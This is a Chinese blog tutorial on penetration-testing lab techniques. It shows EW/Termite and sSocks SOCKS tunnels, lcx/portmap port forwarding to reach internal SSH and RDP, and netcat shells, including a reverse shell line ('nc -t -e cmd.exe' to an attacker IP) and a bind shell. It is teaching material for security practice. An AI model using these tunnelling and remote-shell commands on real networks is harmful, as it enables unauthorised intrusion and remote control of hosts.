端口与流量转发

流量转发

socks代理工具

Termite 是EW(EarthWorm)的最新版,官方链接: http://rootkiter.com/Termite/

主要特性: 多平台支持、跳板机互联、正反向级联、小巧无依赖、内置Shell令主机管理更方便

sSocks 工具地址: http://sourceforge.net/projects/ssocks/

sSocks是一个socks代理工具套装,可用来开启socks代理服务,支持socks5验证,支持IPV6和UDP,并提供反向socks代理服务,即将远程计算机作为socks代理服务端,反弹回本地,极大方便内网的渗透测试,其最新版为0.0.14

下载解压后,执行命令编译。

nsocks 类似通过Socks5代理后的netcat,可用来测试socks server ssocksd 用来开启Socks5代理服务 ssocks 本地启用Socks5服务,并反弹到另一IP地址 rcsocks 接收反弹过来的Socks5服务,并转向另一端口

反向代理实验步骤:

将kali 和 win03 都安装EW工具

在这里插入图片描述

在这里插入图片描述

2

在公网服务器(kali 3.106)上执行以下命令:

./ew_for_linux64 -s rcsocks -l 1080 -e 1024 监听本机的1080端口转发到反连1024端口的主机

在这里插入图片描述
kaili配置两块网卡

在这里插入图片描述

在目标机器执行以下命令
.\ew_for_Win.exe -s rssocks -d 192.168.3.106 -e 1024 通过socks隧道连接公网IP的1024端口

在这里插入图片描述

与公网服务器连接成功. 并且在火狐开启代理

在这里插入图片描述
服务器(kali)ip
在这里插入图片描述

在这里插入图片描述

正向代理

./ew -s ssocksd -l 8888 开启 8888 端口的 socks 代理 (kaili服务器 )

在这里插入图片描述
配置火狐浏览器

在这里插入图片描述

端口转发

lcx.exe是一个端口转发工具,有Windows版和Linux版两个版本,Windows版是lcx.exe,Linux版为portmap,

在这里插入图片描述

portmap实验步骤:公网主机Centos

先在具有公网ip的主机上执行:

./portmap -m 2 -p1 6666 -h2 公网主机ip -p2 7777 意思是监听来自6666端口的请求,将其转发到7777端口

在这里插入图片描述

再在内网主机上执行:

./portmap -m 3 -h1 127.0.0.1 -p1 22 -h2 公网主机ip -p2 6666

意思就是将内网主机22端口的流量转发到公网主机的6666端口

在这里插入图片描述

然后在Linux系统命令行下执行

ssh 公网主机ip 7777
即可连接内网主机。

在这里插入图片描述

nc 反弹

反向连接实验步骤:kali(外网ip) win03(内网ip)

kali开启监听端口 nc - lvvp 4444

在这里插入图片描述
2.

win03 输入指令 nc -t -e cmd.exe 192.168.3.106(公网ip) 4444

在这里插入图片描述
3.

可以看见反弹成功

在这里插入图片描述

正向连接实验步骤:win03作为远程主机 kali作为本机

控制端主动连接被控制端

远程主机上执行:

nc -l -p 4444 -t -e cmd.exe

在这里插入图片描述
2.

本地主机上执行:

nc -vv 远程主机ip 4444

连接成功

在这里插入图片描述

lcx 内网端口转发

实验步骤:公网主机win03 内网主机 win08r2

08上输入指令
lcx -slave 公网主机ip 4444 127.0.0.1 3389
意思是把内网主机的 3389 端口转发到具有公网ip主机的 4444 端口

在这里插入图片描述

公网主机win03执行命令

Lcx –listen 公网主机端口1(内网主机给转发过来的端口) 公网主机端口2

lcx -listen 4444 6666

在这里插入图片描述

打开远程连接验证

公网ip 端口号

在这里插入图片描述

已标记关键词 清除标记
©️2020 CSDN 皮肤主题: 游动-白 设计师:白松林 返回首页